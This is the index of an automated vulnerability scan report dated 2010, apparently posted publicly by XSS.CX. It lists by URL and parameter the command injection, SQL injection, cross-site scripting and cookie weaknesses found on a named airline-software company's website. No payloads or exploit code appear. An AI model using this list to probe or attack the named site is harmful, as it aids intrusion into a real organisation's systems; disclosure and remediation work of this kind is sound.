Report generated by XSS.CX at Wed Oct 06 08:11:22 EDT 2010.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. OS command injection

2. SQL injection

2.1. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist [name of an arbitrarily supplied request parameter]

2.2. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [REST URL parameter 1]

2.3. http://www.sabreairlinesolutions.com/home/business_issues [exp_last_activity cookie]

2.4. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/ [exp_last_activity cookie]

2.5. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations [exp_tracker cookie]

2.6. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/ [exp_last_activity cookie]

2.7. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ [__utmb cookie]

2.8. http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds [User-Agent HTTP header]

2.9. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager [exp_tracker cookie]

2.10. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/ [__utma cookie]

2.11. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/ [REST URL parameter 4]

2.12. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/ [exp_last_visit cookie]

2.13. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer [__utmc cookie]

2.14. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager [__utma cookie]

2.15. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/ [User-Agent HTTP header]

2.16. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control [__utma cookie]

2.17. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/ [__utma cookie]

2.18. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub [REST URL parameter 1]

2.19. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/ [REST URL parameter 2]

2.20. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fleet_manager [name of an arbitrarily supplied request parameter]

2.21. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [REST URL parameter 1]

2.22. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [Referer HTTP header]

2.23. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [__utma cookie]

2.24. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager [exp_last_activity cookie]

2.25. http://www.sabreairlinesolutions.com/home/products_services/sabre_community_portal [REST URL parameter 3]

2.26. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [Referer HTTP header]

2.27. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [__utmc cookie]

2.28. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [exp_last_activity cookie]

2.29. http://www.sabreairlinesolutions.com/images/uploads/flash/flvPlayer.swf [REST URL parameter 4]

3. Cross-site scripting (reflected)

3.1. http://www.sabreairlinesolutions.com/home/about [name of an arbitrarily supplied request parameter]

3.2. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ [name of an arbitrarily supplied request parameter]

3.3. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/ [name of an arbitrarily supplied request parameter]

3.4. http://www.sabreairlinesolutions.com/home/about/executive_team/ [name of an arbitrarily supplied request parameter]

3.5. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett [REST URL parameter 4]

3.6. http://www.sabreairlinesolutions.com/home/about/media_press/ [name of an arbitrarily supplied request parameter]

3.7. http://www.sabreairlinesolutions.com/home/about/privacy_policy/ [name of an arbitrarily supplied request parameter]

3.8. http://www.sabreairlinesolutions.com/home/about/sitemap/ [name of an arbitrarily supplied request parameter]

3.9. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [name of an arbitrarily supplied request parameter]

3.10. http://www.sabreairlinesolutions.com/home/ascend [name of an arbitrarily supplied request parameter]

3.11. http://www.sabreairlinesolutions.com/home/ascend [search_term parameter]

3.12. http://www.sabreairlinesolutions.com/home/ascend [sort_term parameter]

3.13. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]

3.14. http://www.sabreairlinesolutions.com/home/ascend/ [name of an arbitrarily supplied request parameter]

3.15. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]

3.16. http://www.sabreairlinesolutions.com/home/ascend/archive [name of an arbitrarily supplied request parameter]

3.17. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]

3.18. http://www.sabreairlinesolutions.com/home/ascend/archive/ [name of an arbitrarily supplied request parameter]

3.19. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]

3.20. http://www.sabreairlinesolutions.com/home/ascend/contact [name of an arbitrarily supplied request parameter]

3.21. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]

3.22. http://www.sabreairlinesolutions.com/home/ascend/contact/ [name of an arbitrarily supplied request parameter]

3.23. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]

3.24. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]

3.25. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]

3.26. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]

3.27. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]

3.28. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]

3.29. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]

3.30. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]

3.31. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]

3.32. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]

3.33. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]

3.34. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]

3.35. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]

3.36. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]

3.37. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]

3.38. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]

3.39. http://www.sabreairlinesolutions.com/home/business_issues [name of an arbitrarily supplied request parameter]

3.40. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]

3.41. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]

3.42. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]

3.43. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]

3.44. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]

3.45. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]

3.46. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]

3.47. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]

3.48. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]

3.49. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]

3.50. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]

3.51. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]

3.52. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]

3.53. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]

3.54. http://www.sabreairlinesolutions.com/home/contact [name of an arbitrarily supplied request parameter]

3.55. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]

3.56. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]

3.57. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]

3.58. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]

3.59. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]

3.60. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]

3.61. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]

3.62. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]

3.63. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]

3.64. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]

3.65. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]

3.66. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]

3.67. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]

3.68. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]

3.69. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]

3.70. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]

3.71. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]

3.72. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]

3.73. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]

3.74. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]

3.75. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]

3.76. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]

3.77. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]

3.78. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]

3.79. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]

3.80. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]

3.81. http://www.sabreairlinesolutions.com/home/includes/form_adi [height parameter]

3.82. http://www.sabreairlinesolutions.com/home/includes/form_adi [iframe parameter]

3.83. http://www.sabreairlinesolutions.com/home/includes/form_adi [name of an arbitrarily supplied request parameter]

3.84. http://www.sabreairlinesolutions.com/home/includes/form_adi [width parameter]

3.85. http://www.sabreairlinesolutions.com/home/includes/form_demo [height parameter]

3.86. http://www.sabreairlinesolutions.com/home/includes/form_demo [iframe parameter]

3.87. http://www.sabreairlinesolutions.com/home/includes/form_demo [name of an arbitrarily supplied request parameter]

3.88. http://www.sabreairlinesolutions.com/home/includes/form_demo [width parameter]

3.89. http://www.sabreairlinesolutions.com/home/includes/form_issues [height parameter]

3.90. http://www.sabreairlinesolutions.com/home/includes/form_issues [iframe parameter]

3.91. http://www.sabreairlinesolutions.com/home/includes/form_issues [issue parameter]

3.92. http://www.sabreairlinesolutions.com/home/includes/form_issues [name of an arbitrarily supplied request parameter]

3.93. http://www.sabreairlinesolutions.com/home/includes/form_issues [width parameter]

3.94. http://www.sabreairlinesolutions.com/home/includes/form_suites [height parameter]

3.95. http://www.sabreairlinesolutions.com/home/includes/form_suites [iframe parameter]

3.96. http://www.sabreairlinesolutions.com/home/includes/form_suites [name of an arbitrarily supplied request parameter]

3.97. http://www.sabreairlinesolutions.com/home/includes/form_suites [suite parameter]

3.98. http://www.sabreairlinesolutions.com/home/includes/form_suites [width parameter]

3.99. http://www.sabreairlinesolutions.com/home/news_events [%004809212e2bef5c79 parameter]

3.100. http://www.sabreairlinesolutions.com/home/news_events [name of an arbitrarily supplied request parameter]

3.101. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]

3.102. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]

3.103. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]

3.104. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]

3.105. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]

3.106. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]

3.107. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2 [name of an arbitrarily supplied request parameter]

3.108. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]

3.109. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]

3.110. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]

3.111. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]

3.112. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2 [name of an arbitrarily supplied request parameter]

3.113. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]

3.114. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]

3.115. http://www.sabreairlinesolutions.com/home/news_events/events/ [name of an arbitrarily supplied request parameter]

3.116. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]

3.117. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]

3.118. http://www.sabreairlinesolutions.com/home/news_events/news/ [name of an arbitrarily supplied request parameter]

3.119. http://www.sabreairlinesolutions.com/home/products_services [name of an arbitrarily supplied request parameter]

3.120. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]

3.121. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]

3.122. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]

3.123. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]

3.124. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]

3.125. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]

3.126. http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service [name of an arbitrarily supplied request parameter]

3.127. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/ [name of an arbitrarily supplied request parameter]

3.128. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost [name of an arbitrarily supplied request parameter]

3.129. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads [name of an arbitrarily supplied request parameter]

3.130. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ [name of an arbitrarily supplied request parameter]

3.131. http://www.sabreairlinesolutions.com/home/products_services/marketing_planning [name of an arbitrarily supplied request parameter]

3.132. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/ [name of an arbitrarily supplied request parameter]

3.133. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier [name of an arbitrarily supplied request parameter]

3.134. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal [name of an arbitrarily supplied request parameter]

3.135. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ [name of an arbitrarily supplied request parameter]

3.136. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]

3.137. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]

3.138. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [name of an arbitrarily supplied request parameter]

3.139. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]

3.140. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]

3.141. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [name of an arbitrarily supplied request parameter]

3.142. http://www.sabreairlinesolutions.com/home/products_services/technology/ [name of an arbitrarily supplied request parameter]

3.143. http://www.sabreairlinesolutions.com/home/includes/form_list [Referer HTTP header]

4. XML injection

4.1. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [__utmb cookie]

4.2. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [exp_last_visit cookie]

5. Session token in URL

6. Referer-dependent response

7. Cross-domain Referer leakage

8. Cross-domain script include

9. Cookie without HttpOnly flag set

9.1. http://www.sabreairlinesolutions.com/home

9.2. http://www.sabreairlinesolutions.com/home/

9.3. http://www.sabreairlinesolutions.com/home/3/

9.4. http://www.sabreairlinesolutions.com/home/3/efdc23b5379445c2a0d7c47043337670/

9.5. http://www.sabreairlinesolutions.com/home/about

9.6. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/

9.7. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/

9.8. http://www.sabreairlinesolutions.com/home/about/executive_team/

9.9. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist

9.10. http://www.sabreairlinesolutions.com/home/about/executive_team/stephen_m._clampett

9.11. http://www.sabreairlinesolutions.com/home/about/executive_team/tom_klein

9.12. http://www.sabreairlinesolutions.com/home/about/media_press/

9.13. http://www.sabreairlinesolutions.com/home/about/privacy_policy/

9.14. http://www.sabreairlinesolutions.com/home/about/sitemap/

9.15. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/

9.16. http://www.sabreairlinesolutions.com/home/ascend

9.17. http://www.sabreairlinesolutions.com/home/ascend/

9.18. http://www.sabreairlinesolutions.com/home/ascend/archive

9.19. http://www.sabreairlinesolutions.com/home/ascend/archive/

9.20. http://www.sabreairlinesolutions.com/home/ascend/contact

9.21. http://www.sabreairlinesolutions.com/home/ascend/contact/

9.22. http://www.sabreairlinesolutions.com/home/ascend/current_issue

9.23. http://www.sabreairlinesolutions.com/home/ascend/current_issue/

9.24. http://www.sabreairlinesolutions.com/home/ascend/error

9.25. http://www.sabreairlinesolutions.com/home/ascend/error/

9.26. http://www.sabreairlinesolutions.com/home/ascend/past_editions

9.27. http://www.sabreairlinesolutions.com/home/ascend/past_editions/

9.28. http://www.sabreairlinesolutions.com/home/ascend/subscribe

9.29. http://www.sabreairlinesolutions.com/home/ascend/subscribe/

9.30. http://www.sabreairlinesolutions.com/home/business_issues

9.31. http://www.sabreairlinesolutions.com/home/business_issues/

9.32. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management

9.33. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/

9.34. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/

9.35. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues

9.36. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/

9.37. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth

9.38. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/

9.39. http://www.sabreairlinesolutions.com/home/contact

9.40. http://www.sabreairlinesolutions.com/home/contact/

9.41. http://www.sabreairlinesolutions.com/home/contact/airline_distribution

9.42. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/

9.43. http://www.sabreairlinesolutions.com/home/contact/airports

9.44. http://www.sabreairlinesolutions.com/home/contact/airports/

9.45. http://www.sabreairlinesolutions.com/home/contact/media_relations

9.46. http://www.sabreairlinesolutions.com/home/contact/media_relations/

9.47. http://www.sabreairlinesolutions.com/home/contact/product_sales

9.48. http://www.sabreairlinesolutions.com/home/contact/product_sales/

9.49. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services

9.50. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/

9.51. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation

9.52. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/

9.53. http://www.sabreairlinesolutions.com/home/includes/

9.54. http://www.sabreairlinesolutions.com/home/includes/form_adi

9.55. http://www.sabreairlinesolutions.com/home/includes/form_demo

9.56. http://www.sabreairlinesolutions.com/home/includes/form_issues

9.57. http://www.sabreairlinesolutions.com/home/includes/form_list

9.58. http://www.sabreairlinesolutions.com/home/includes/form_suites

9.59. http://www.sabreairlinesolutions.com/home/news_events

9.60. http://www.sabreairlinesolutions.com/home/news_events/

9.61. http://www.sabreairlinesolutions.com/home/news_events/event

9.62. http://www.sabreairlinesolutions.com/home/news_events/event/

9.63. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference

9.64. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference

9.65. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2

9.66. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_aircentre_operations_enterprise_solution_user_workshop

9.67. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference

9.68. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference

9.69. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2

9.70. http://www.sabreairlinesolutions.com/home/news_events/events

9.71. http://www.sabreairlinesolutions.com/home/news_events/events/

9.72. http://www.sabreairlinesolutions.com/home/news_events/news

9.73. http://www.sabreairlinesolutions.com/home/news_events/news/

9.74. http://www.sabreairlinesolutions.com/home/products_services

9.75. http://www.sabreairlinesolutions.com/home/products_services/

9.76. http://www.sabreairlinesolutions.com/home/products_services/agency_management

9.77. http://www.sabreairlinesolutions.com/home/products_services/agent_sales_report

9.78. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/

9.79. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/

9.80. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce/

9.81. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_technology/

9.82. http://www.sabreairlinesolutions.com/home/products_services/airports

9.83. http://www.sabreairlinesolutions.com/home/products_services/automated_exchange_and_refunds

9.84. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images

9.85. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/

9.86. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue/

9.87. http://www.sabreairlinesolutions.com/home/products_services/corporate_management

9.88. http://www.sabreairlinesolutions.com/home/products_services/credit_suite

9.89. http://www.sabreairlinesolutions.com/home/products_services/developer_tool

9.90. http://www.sabreairlinesolutions.com/home/products_services/electronic_ticketing

9.91. http://www.sabreairlinesolutions.com/home/products_services/electronic_ticketing_for_third-party_ground_handling

9.92. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations

9.93. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/

9.94. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology

9.95. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/

9.96. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost

9.97. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads

9.98. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/images/pdf_icon.gif

9.99. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images

9.100. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/

9.101. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change

9.102. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list

9.103. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/

9.104. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew

9.105. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight

9.106. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance

9.107. http://www.sabreairlinesolutions.com/home/products_services/frequent_flyer_management

9.108. http://www.sabreairlinesolutions.com/home/products_services/gds_electronic_ticketing

9.109. http://www.sabreairlinesolutions.com/home/products_services/interact_interface

9.110. http://www.sabreairlinesolutions.com/home/products_services/interline_electronic_ticketing_hub

9.111. http://www.sabreairlinesolutions.com/home/products_services/multitask_manager

9.112. http://www.sabreairlinesolutions.com/home/products_services/product/agency_management

9.113. http://www.sabreairlinesolutions.com/home/products_services/product/agent_sales_report

9.114. http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds

9.115. http://www.sabreairlinesolutions.com/home/products_services/product/credit_suite

9.116. http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing

9.117. http://www.sabreairlinesolutions.com/home/products_services/product/multitask_manager

9.118. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager

9.119. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/

9.120. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_airspace_flow_manager

9.121. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_airspace_flow_manager/

9.122. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control

9.123. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/

9.124. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager

9.125. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/

9.126. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier

9.127. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/

9.128. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer

9.129. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer/

9.130. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager

9.131. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager/

9.132. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager

9.133. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner

9.134. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager

9.135. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/

9.136. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control

9.137. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control/

9.138. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager

9.139. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager/

9.140. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager

9.141. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager/

9.142. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker

9.143. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin

9.144. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager

9.145. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner

9.146. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence

9.147. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager

9.148. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager

9.149. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager

9.150. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager

9.151. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce

9.152. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal

9.153. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/

9.154. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity

9.155. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/

9.156. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub

9.157. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/

9.158. http://www.sabreairlinesolutions.com/home/products_services/product/travel_bank

9.159. http://www.sabreairlinesolutions.com/home/products_services/product_index

